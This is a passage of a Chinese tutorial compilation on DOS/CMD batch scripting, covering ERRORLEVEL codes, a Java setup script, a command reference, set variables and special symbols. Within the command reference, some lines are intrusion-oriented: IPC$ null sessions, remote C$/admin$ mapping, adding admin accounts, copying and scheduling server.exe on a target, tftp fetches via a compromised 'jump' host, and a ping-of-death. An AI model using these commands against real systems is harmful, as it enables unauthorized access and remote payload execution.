  203. IF ERRORLEVEL 0 ECHO 成功拷贝文件
  204. 如果文件拷贝成功,屏幕就会显示“成功拷贝文件”,否则就会显示“文件拷贝失败”。
  205. IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的,注意只是上一个命令的返回值,而且返回值必须依照从大到小次序顺序判断。因此下面的批处理文件是错误的: @ECHO OFF
  206. XCOPY C:\AUTOEXEC.BAT D:\
  207. CHO 成功拷贝文件
  208. IF ERRORLEVEL 1 ECHO 未找到拷贝文件
  209. IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作
  210. IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作
  211. IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误
  212. 无论拷贝是否成功,后面的:
  213. 未找到拷贝文件
  214. 用户通过ctrl-c中止拷贝操作
  215. 预置错误阻止文件拷贝操作
  216. 拷贝过程中写盘错误
  217. 都将显示出来。
  218. 以下就是几个常用命令的返回值及其代表的意义:
  219. backup
  220. 0 备份成功
  221. 1 未找到备份文件
  222. 2 文件共享冲突阻止备份完成
  223. 3 用户用ctrl-c中止备份
  224. 4 由于致命的错误使备份操作中止
  225. diskcomp
  226. 0 盘比较相同
  227. 1 盘比较不同
  228. 2 用户通过ctrl-c中止比较操作
  229. 3 由于致命的错误使比较操作中止
  230. 4 预置错误中止比较
  231. diskcopy
  232. 0 盘拷贝操作成功
  233. 1 非致命盘读/写错
  234. 2 用户通过ctrl-c结束拷贝操作
  235. 3 因致命的处理错误使盘拷贝中止
  236. 4 预置错误阻止拷贝操作
  237. format
  238. 0 格式化成功
  239. 3 用户通过ctrl-c中止格式化处理
  240. 4 因致命的处理错误使格式化中止
  241. 5 在提示“proceed with format(y/n)?”下用户键入n结束
  242. xcopy
  243. 0 成功拷贝文件
  244. 1 未找到拷贝文件
  245. 2 用户通过ctrl-c中止拷贝操作
  246. 4 预置错误阻止文件拷贝操作
  247. 5 拷贝过程中写盘错误
  248. =============================================================@echo off //不显示shell的命令。
  249. Setlocal //环境改变只适用于这个文件。
  250. %OS% //为当前的操作系统。
  251. Rem //注释一行文本。
  252. Goto 标签 //改变执行顺序,去标签位置.
  253. :标签 //定义一个标签。
  254. Set 变量名=//定义变量
  255. Not //取反
  256. Netstat –na //显示当前被点用的端口.
  257. %0 %1 %2 //用于表示批处理文件的参数0为命令,共1-9个参数。
  258. Shift //用于向前一个参数,原10,原21.每调用一次shift向前一移动一位。
  259. Call //调用其他批处理文件或命令。
  260. Start 命令 参数 //指示出在另一个窗口中开始运行命令。
  261. =============================================================
  262. :: 这段批处理程序可以自动设置Java环境变量@echo off
  263. IF EXIST %1\bin\java.exe (
  264. rem 如输入正确的 Java2SDK 安装目录,开始设置环境变量
  265. @setx JAVA_HOME %1
  266. @setx path %path%;%JAVA_HOME%\bin
  267. @setx classpath %classpath%;.
  268. @setx classpath %classpath%;%JAVA_HOME%\lib\tools.jar
  269. @setx classpath %classpath%;%JAVA_HOME%\lib\dt.jar
  270. @setx classpath %classpath%;%JAVA_HOME%\jre\lib\rt.jar@echo on@echo Java 2 SDK 环境参数设置完毕,正常退出。
  271. ) ELSE (
  272. IF "%1"=="" (
  273. rem 如没有提供安装目录,提示之后退出@echo on@echo 没有提供 Java2SDK 的安装目录,不做任何设置,现在退出环境变量设置。
  274. ) ELSE (
  275. rem 如果提供非空的安装目录但没有bin\java.exe,则指定的目录为错误的目录@echo on@echo 非法的 Java2SDK 的安装目录,不做任何设置,现在退出环境变量设置。
  276. )
  277. )
  278. dos命令参考~~~
  279. net use \\ip\ipc$ " " /user:" " 建立IPC空链接
  280. net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
  281. net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
  282. net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
  283. net use \\ip\ipc$ /del 删除IPC链接
  284. net use h: /del 删除映射对方到本地的为H:的映射
  285. net user 用户名 密码 /add 建立用户
  286. net user guest /active:yes 激活guest用户
  287. net user 查看有哪些用户
  288. net user 帐户名 查看帐户的属性
  289. net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
  290. net start 查看开启了哪些服务
  291. net start 服务名  开启服务;(如:net start telnet, net start schedule)
  292. net stop 服务名 停止某服务
  293. net time \\目标ip 查看对方时间
  294. net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
  295. net view 查看本地局域网内开启了哪些共享
  296. net view \\ip 查看对方局域网内开启了哪些共享
  297. net config 显示系统网络设置
  298. net logoff 断开连接的共享
  299. net pause 服务名 暂停某服务
  300. net send ip "文本信息" 向对方发信息
  301. net ver 局域网内正在使用的网络连接类型和信息
  302. net share 查看本地开启的共享
  303. net share ipc$ 开启ipc$共享
  304. net share ipc$ /del 删除ipc$共享
  305. net share c$ /del 删除C:共享
  306. net user guest 12345 用guest用户登陆后用将密码改为12345
  307. net password 密码 更改系统登陆密码
  308. netstat -a 查看开启了哪些端口,常用netstat -an
  309. netstat -n 查看端口的网络连接情况,常用netstat -an
  310. netstat -v 查看正在进行的工作
  311. netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
  312. netstat -s 查看正在使用的所有协议使用情况
  313. nbtstat -A ip 对方136139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
  314. tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
  315. ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
  316. ping -t -l 65550 ip 死亡之ping(发送大于K的文件并一直ping就成了死亡之ping)
  317. ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
  318. tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
  319. kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
  320. del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
  321. del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
  322. move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
  323. fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> ""> >" 是重定向命令
  324. at id号 开启已注册的某个计划任务
  325. at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
  326. at id号 /delete 停止某个已注册的计划任务
  327. at 查看所有的计划任务
  328. at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
  329. finger username @host 查看最近有哪些用户登陆
  330. telnet ip 端口 远和登陆服务器,默认端口为23
  331. open ip 连接到IP(属telnet登陆后的命令)
  332. telnet 在本机上直接键入telnet 将进入本机的telnet
  333. copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
  334. copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
  335. cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
  336. copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
  337. xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
  338. tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
  339. tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
  340. ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
  341. route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
  342. arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
  343. start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
  344. mem 查看cpu使用情况
  345. attrib 文件名(目录名) 查看某文件(目录)的属性
  346. attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
  347. dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
  348. date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
  349. set 指定环境变量名称=要指派给变量的字符 设置环境变量
  350. set 显示当前所有的环境变量
  351. set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
  352. pause 暂停批处理程序,并显示出:请按任意键继续....
  353. if 在批处理程序中执行条件处理(更多说明见if命令及变量)
  354. goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
  355. call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
  356. for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
  357. echo onoff 打开或关闭echo,仅用echo不加参数则显示当前echo设置
  358. echo 信息 在屏幕上显示出信息
  359. echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
  360. findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
  361. find 文件名 查找某文件
  362. title 标题名字 更改CMD窗口标题名字
  363. color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
  364. prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
  365. print 文件名 打印文本文件
  366. 2ver 在DOS窗口下显示版本信息
  367. winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
  368. format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
  369. md 目录名 创建目录
  370. replace 源文件 要替换文件的目录 替换文件
  371. ren 原文件名 新文件名 重命名文件名
  372. tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
  373. type 文件名 显示文本文件的内容
  374. more 文件名 逐屏显示输出文件
  375. doskey 要锁定的命令=字符
  376. doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
  377. taskmgr 调出任务管理器
  378. chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
  379. tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
  380. exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
  381. path 路径\可执行文件的文件名 为可执行文件设置一个路径。
  382. cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
  383. regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
  384. regedit /e 注册表文件名 导出注册表
  385. cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
  386. cacls 文件名 查看文件的访问用户权限列表
  387. REM 文本内容 在批处理文件中添加注解
  388. netsh 查看或更改本地网络配置情况
  389. IIS服务命令:
  390. iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
  391. iisreset /startstop 启动(停止)所有Internet服务
  392. iisreset /restart 停止然后重新启动所有Internet服务
  393. iisreset /status 显示所有Internet服务状态
  394. iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
  395. iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
  396. iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
  397. iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
  398. FTP 命令: (后面有详细说明内容)
  399. ftp的命令行格式为:
  400. ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
  401. -d 使用调试方式。
  402. -n 限制ftp的自动登录,即不使用.netrc文件。
  403. -g 取消全局文件名。
  404. help [命令] 或 /?[命令] 查看命令说明
  405. bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
  406. pwd 列出当前远端主机目录
  407. put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
  408. get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
  409. mget [remote-files] 从远端主机接收一批文件至本地主机
  410. mput local-files 将本地主机中一批文件传送至远端主机
  411. dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
  412. ascii 设定以ASCII方式传送文件(缺省值)
  413. bin 或 image 设定以二进制方式传送文件
  414. bell 每完成一次文件传送,报警提示
  415. cdup 返回上一级目录
  416. close 中断与远程服务器的ftp会话(与open对应)
  417. open host[port] 建立指定ftp服务器连接,可指定连接端口
  418. delete 删除远端主机中的文件
  419. mdelete [remote-files] 删除一批文件
  420. mkdir directory-name 在远端主机中建立目录
  421. rename [from] [to] 改变远端主机中的文件名
  422. rmdir directory-name 删除远端主机中的目录
  423. status 显示当前FTP的状态
  424. system 显示远端主机系统类型
  425. user user-name [password] [account] 重新以别的用户名登录远端主机
  426. open host [port] 重新建立一个新的连接
  427. prompt 交互提示模式
  428. macdef 定义宏命令
  429. lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
  430. chmod 改变远端主机的文件权限
  431. case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
  432. cd remote-dir 进入远程主机目录
  433. cdup 进入远程主机目录的父目录
  434. ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
  435. MYSQL 命令:
  436. mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
  437. (例:mysql -h110.110.110.110 -Uroot -P123456
  438. 注:u与root可以不用加空格,其它也一样)
  439. exit 退出MYSQL
  440. mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
  441. grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
  442. show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
  443. use mysql;
  444. show tables; 显示库中的数据表
  445. describe 表名; 显示数据表的结构
  446. create database 库名; 建库
  447. use 库名;
  448. create table 表名 (字段设定列表); 建表
  449. drop database 库名;
  450. drop table 表名; 删库和删表
  451. delete from 表名; 将表中记录清空
  452. select * from 表名; 显示表中的记录
  453. mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
  454. win2003系统下新增命令(实用部份):
  455. shutdown /参数 关闭或重启本地或远程主机。
  456. 参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0180秒之间, /A取消开机,/M //IP 指定的远程主机。
  457. 例:shutdown /r /t 0 立即重启本地主机(无延时)
  458. taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
  459. 参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
  460. tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
  461. 参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
  462. Linux系统下基本命令: 要区分大小写
  463. uname 显示版本信息(同win2K的 ver)
  464. dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
  465. pwd 查询当前所在的目录位置
  466. cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
  467. cat 文件名 查看文件内容
  468. cat >abc.txt 往abc.txt文件中写上内容。
  469. more 文件名 以一页一页的方式显示一个文本文件。
  470. cp 复制文件
  471. mv 移动文件
  472. rm 文件名 删除文件,rm -a 目录名删除目录及子目录
  473. mkdir 目录名 建立目录
  474. rmdir 删除子目录,目录内没有文档。
  475. chmod 设定档案或目录的存取权限
  476. grep 在档案中查找字符串
  477. diff 档案文件比较
  478. find 档案搜寻
  479. date 现在的日期、时间
  480. who 查询目前和你使用同一台机器的人以及Login时间地点
  481. w 查询目前上机者的详细资料
  482. whoami 查看自己的帐号名称
  483. groups 查看某人的Group
  484. passwd 更改密码
  485. history 查看自己下过的命令
  486. ps 显示进程状态
  487. kill 停止某进程
  488. gcc 黑客通常用它来编译C语言写的文件
  489. su 权限转换为指定使用者
  490. telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
  491. ftp ftp连接上某服务器(同win2K)
  492. Windows 排程範例
  493. 若要在 Windows 系統上啟動自動化的備份工作,排程服務必須執行中。您可以利用下列指令來啟動這個服務:
  494. net start schedule
  495. 如果排程服務正在執行中,則工作可以利用 at 指令來加以排程,這個指令是用來呼叫批次檔 backup.cmd (backup.cmd 的內容可以在Windows 的備份排程元素找到)。如果您想要在每個星期五的下午 8 點整執行這個指令,則必須呼叫下列指令:
  496. at 20:00 /every:f cmd /c c::\db2\C21\sapscripts\backup.cmd


bat的变量与命令set的用法

set 功能一览
[设置变量]
格式:set 变量名=变量值
详细:被设定的变量以%变量名%引用

[取消变量]
格式:set 变量名=
详细:取消后的变量若被引用%变量名%将为空

[展示变量]
格式:set 变量名
详细:展示以变量名开头的所有变量的值

[列出所有可用的变量]
格式:set


[计算器]
格式:set  /a 表达式
示例:set /a 1+2*3  输出 7

[设置变量为表达式计算后的值]
set a=1+2
echo %a% ==>输出1+2
------------------------------------
set /a a=1+2
echo %a% ==>输出3

[设置变量为用户输入的值]
set /p a=输入一个值 ==>输出 输入一个值
echo %a% ==>显示用户输入的值

!注意!
set不能用在复合语句里面比如if 1==1 set a=2或者for %%i in (a) do set a=2


预定义的变量

下面是些已经被底层定义好可以直接使用的变量:不会出现在 SET 显示的变量列表中
%CD% - 扩展到当前目录字符串。
%DATE% - 用跟 DATE 命令同样的格式扩展到当前日期。
%TIME% - 用跟 TIME 命令同样的格式扩展到当前时间。
%RANDOM% - 扩展到 0 和 32767 之间的任意十进制数字。
%ERRORLEVEL% - 扩展到当前 ERRORLEVEL 数值。
%CMDEXTVERSION% - 扩展到当前命令处理器扩展名版本号。
%CMDCMDLINE% - 扩展到调用命令处理器的原始命令行。
%0 bat的完整路径名如"C:\Windows\system32\xxx.bat"
%1 bat参数1依次类推%2参数2...
%path% - 当前的环境变量。以分号隔开的路径列表,路径可包含空格,可以以'\'结尾, 可以以双引号包围之。



扩展变量

@ 与%i相关的变量(bat参数或者for循环的%i)
假设文件为C:\Documents and Settings\jinsun\桌面\ParseSinglePkgs.bat
%0        C:\Documents and Settings\jinsun\桌面\ParseSinglePkgs.bat
%~dp0  C:\Documents and Settings\jinsun\桌面\
%cd%   C:\Documents and Settings\jinsun\桌面
%~nx0   ParseSinglePkgs.bat
%~n0     ParseSinglePkgs
%~x0     .bat

@ 与%VAR%相关的变量
%VAR:str1=str2%   会将VAR中的str1替换为str2(str2如果为空则可以达到删除的效果,str1前可以加*,变量%ABC:*B=%是C)
%VAR:~0,-2%          会提取VAR 变量的所有字符,除了最后两个
%VAR:~2%              会提取VAR 变量的除前两个的所有字符
%VAR:~-2%             会提取VAR 变量的最后两个
%VAR:~2,5%           提取从第2个字符开始的5个字符




CMD&DOS下符号的作用参考


From:

http://wenku.baidu.com/view/6e25b51fc281e53a5802ff72.html

来源:
http://www.cn-dos.net/forum/viewthread.php?tid=30985&fpage=1
http://www.cn-dos.net/forum/viewthread.php?tid=24289&fpage=1
因关于DOS符号的总结很少,所以根据[1],经过几次整理之后,写了下面这个《CMD/DOS符号参考》,推荐新手好好看看,老手温习。

标题:[整理参考] CMD/DOS下符号的作用参考
作者:lxmxn [at] bbs.cn-dos.net
时间:2007-5-27
邮箱:lxmxn520[at]163.com
说明:1、转帖请注明原帖出处属于中国DOS联盟(www.cn-dos.net/forum);
   2、欢迎大家补充还未说明到的符号;
   3、有任何错误还请不吝指出;
   4、特别感谢 qzwqzw 对此资料提出的补充和建议。 

正文开始:
__________________________________________________________________________________________
            一、单符号
~
① 在for中表示使用增强的变量扩展。
② 在%var:~n,m%中表示使用扩展环境变量指定位置的字符串。
③ 在set/a中表示一元运算符,将操作数按位取反。

!
① 在set /a中一元运算符,表示逻辑非。比如set /a a=!0,这时a就表示逻辑1。

@
① 隐藏命令行本身的回显,常用于批处理中。

$
① 在findstr命令里面表示一行的结束。
② 在prompt命令里面,表示将其后的字符转义(符号化或者效果化)。

%
① 在set /a中的二元运算符,表示算术取余。
② 命令行环境下,在for命令in前,后面接一个字符(可以是字母、数字或者一些特定字符),表示指定一个循环或者遍历指标变量。
③ 批处理中,后接一个数字表示引用本批处理当前执行时的指定的参数。
④ 其它情况下,%将会被脱去(批处理)或保留(命令行)

^
① 取消特定字符的转义作用,比如& | > < ! "等,但不包括%。比如要在屏幕显示一些特殊的字符,比如> >> | ^ &等符号时,就可以在其前面加一个^符号来显示这个^后面的字符了,^^就是显示一个^,^|就是显示一个|字符了;
② 在set/a中的二元运算符,表示按位异或。
③ 在findstr/r的[]中表示不匹配指定的字符集。

&
① 命令连接字符。比如我要在一行文本上同时执行两个命令,就可以用&命令连接这两个命令。
② 在set/a中是按位与。

*
① 代表任意个任意字符,就是我们通常所说的"通配符";比如想在c盘的根目录查找c盘根目录里所有的文本文件(.txt),那么就可以输入命令"dir c:\*.txt"。
② 在set /a中的二元运算符,表示算术乘法。
③ 在findstr/r中表示将前一个字符多次匹配。

-
① 范围表示符,比如日期的查找,for命令里的tokens操作中就可以用到这个字符。
② 在findstr/r中连接两个字符表示匹配范围。
③ -跟在某些命令的/后表示取反向的开关。
④ 在set /a中:
1.表示一个负数。
2.表示算术减运算。

+
① 主要是在copy命令里面会用到它,表示将很多个文件合并为一个文件,就要用到这个+字符了。
② 在set/a中的二元运算符,表示算术加法。

:
① 标签定位符,表示其后的字符串为以标签,可以作为goto命令的作用对象。比如在批处理文件里面定义了一个":begin"标签,用"goto begin"命令就可以转到":begin"标签后面来执行批处理命令了。
② 在%var:string1=string2%中分隔变量名和被替换字串关系。

|
① 管道符,就是将上一个命令的输出,作为下一个命令的输入."dir /a/b |more"就可以逐屏的显示dir命令所输出的信息。
② 在set/a中的二元运算符,表示按位或。
③ 在帮助文档中表示其前后两个开关、选项或参数是二选一的。

/
① 表示其后的字符(串)是命令的功能开关(选项)。比如"dir /s/b/a-d"表示"dir"命令指定的不同的参数。
② 在set/a中表示除法。

>
① 命令重定向符,将其前面的命令的输出结果重新定向到其后面的设备中去,后面的设备中的内容被覆盖。比如可以用"dir > lxmxn.txt"将"dir"命令的结果输出到"lxmxn.txt"这个文本文件中去。
② 在findstr/r中表示匹配单词的右边界,需要配合转义字符\使用。

<
① 将其后面的文件的内容作为其前面命令的输入。
② 在findstr/r中表示匹配单词的左边界,需要配合转义字符\使用。

=
① 赋值符号,用于变量的赋值。比如"set a=windows"的意思意思是将"windows"这个字符串赋给变量"a"。
② 在set/a中表示算术运算,比如"set /a x=5-6*5"。

\
① 这个"\"符号在有的情况下,代表的是当前路径的根目录.比如当前目录在c:\windows\system32下,那么你"dir \"的话,就相当与"dir c:\"。
② 在findstr/r中表示正则转义字符。

,
① 在set /a中表示连续表达式的分割符。
② 在某些命令中分割元素。

.
① 在路径的\后紧跟或者单独出现时:
一个.表示当前目录。
两个.表示上一级目录。
② 在路径中的文件名中出现时:
最后的一个.表示主文件名与扩展文件名的分隔。

?
① 在findstr/r中表示在此位置匹配一个任意字符。
② 在路径中表示在此位置通配任意一个字符。
③ 紧跟在/后表示获取命令的帮助文档。

__________________________________________________________________________________________

            二、多符号(符号不能分隔)

&&
① 连接两个命令,当&&前的命令成功时,才执行&&后的命令。

||
① 连接两个命令,当||前的命令失败时,才执行||后的命令。

>& 
① 将一个句柄的输出写入到另一个句柄的输入中。 

<&
① 从一个句柄读取输入并将其写入到另一个句柄输出中。

%%
① 两个连续的%表示在预处理中脱为一个%。
② 批处理中,在for语句的in子句之前,连续两个%紧跟一个字符(可以是字母、数字和一些特定字符),表示指定一个循

环或者遍历指标变量。
③ 批处理中,在for语句中,使用与in之前指定的指标变量相同的串,表示引用这个指标变量。

>>
① 命令重定向符,将其前面的命令的输出结果追加到其后面的设备中去。
② 在set /a中的二元运算符,表示逻辑右移。

==
① 在if命令中判断==两边的元素是否相同。

<<
① 在set /a中的二元运算符,表示逻辑左移。

+=
① 在set /a中的二元运算符。例如set /a a+=b表示将a加上b的结果赋值给a。

-=
① 在set /a中的二元运算符。例如set /a a-=b表示将a减去b的结果赋值给a。

*=
① 在set /a中的二元运算符。例如set /a a*=b表示将a乘以b的结果赋值给a。

/=
① 在set /a中的二元运算符。例如set /a a/=b表示将a除以b的结果赋值给a。

%=
① 在set /a中的二元运算符。例如set /a a%=b表示将a除以b的余数赋值给a。
【注:命令行可以直接用 set /a a%=b ,在批处理里面可以用 set /a a%%=b 。】

^=
① 在set /a中的二元运算符。例如set /a a"^="b表示将a与b按位异的结果赋值给a。
【注:这里 "^=" 加引号是为了防止^被转义,下同。】

&=
① 在set /a中的二元运算符。例如set /a a"&="b表示将a与b按位与的结果赋值给a。

|=
① 在set /a中的二元运算符。例如set /a a"|="b表示将a与b按位或的结果赋值给a。

<<=
① 在set /a中的二元运算符。例如set /a a"<<="b表示将a按位左移b位的结果赋值给a。

>>=
① 在set /a中的二元运算符。例如set /a a">>="b表示将a按位右移b位的结果赋值给a。

\<
① 在findstr的一般表达式中表示字的开始处。

\>
① 在findstr的一般表达式中表示字的结束处。

__________________________________________________________________________________________

            三、双符号对(两个符号之间须指定字符串)

! !
① 当启用变量延迟时,使用!!将变量名扩起来表示对变量值的引用。

' '
① 在for/f中表示将它们包含的内容当作命令行执行并分析其输出。
② 在for/f "usebackq"中表示将它们包含的字符串当作字符串分析。

( )
① 命令包含或者是具有优先权的界定符,比如for命令要用到这个(),我们还可以在if,echo等命令中见到它的身影。
② 在set /a中表示表达式分组。

" "
① 界定符,在表示带有空格的路径时常要用""来将路径括起来,在一些命令里面也需要" "符号。
② 在for/f中将表示它们包含的内容当作字符串分析。
③ 在for/f "usebackq"表示它们包含的内容当作文件路径并分析其文件的内容。
④ 在其它情况下表示其中的内容是一个完整的字符串,其中的>、>>、<、&、|、空格等不再转义。

` `
① 在for/f中表示它们所包含的内容当作命令行执行并分析它的输出。

% %
① 使用两个单独的%包含一个字符串表示引用以此串为名的环境变量。比如一个%time%可以扩展到当前的系统时间。[ ]① 在帮助文档表示其中的开关、选项或参数是可选的。
② 在findstr /r中表示按其中指定的字符集匹配。 
作者: weasel 经验值:1756 发言:491 回复:593 写信 发表于:2009_04_12 PM 11:22 回贴:1 

回  复:批处理常用符号详解综合教程 
批处理常用符号详解综合教程

这是一篇针对批处理中常用符号的详细解释,每个符号都有解释及相应的举例,希望通过比较系统的讲述,能让新手尽快入门。

  在这篇帖子中,我对常用符号的讲解做如下限定:
  1、收集批处理中经常用到的符号;
  2、每个常用符号,只讲述最常用的功能;深入的用法留待将来介绍;
  这样限定的原因,一是让新手系统地接触最常用符号的常用功能,不至于一开始就陷入技术细节中难以自拔;二是有些符号的用法非常罕见,没有特定的需求可以忽略掉,比如句柄复制符号;三是有些高深的内容本人也没有完全消化,只解说一鳞半爪难免会误人子弟,比如 set /a 中的^、!等符号;

  如有遗漏或谬误,请大家及时跟帖,帮忙修正。
————————————————————————————————————————————

1、@
  一般在它之后紧跟一条命令或一条语句,则此命令或语句本身在执行的时候不会显示在屏幕上。请把下面的代码保存为test.cmd文件,然后运行,比较一下两条echo语句在屏幕上的输出差异: 

复制内容到剪贴板 
代码:
echo a
@pause
@echo b
@pause
  执行结果如下: 
引用:
C:\Documents and Settings\JM\桌面>echo a
a
请按任意键继续...
b
请按任意键继续...
2、%、%%
  百分号用在不同的场合,有不同的含义:
  ① 当百分号成对出现,并且其间包含非特殊字符时,一般做变量引用处理,比如:%var%、%str%。把以下代码保存为批处理文件,运行后观察屏幕显示结果: 
复制内容到剪贴板 
代码:
@echo off
set str=abc
echo 变量 str 的值是: %str%
pause
  在屏幕上将显示这样的结果: 
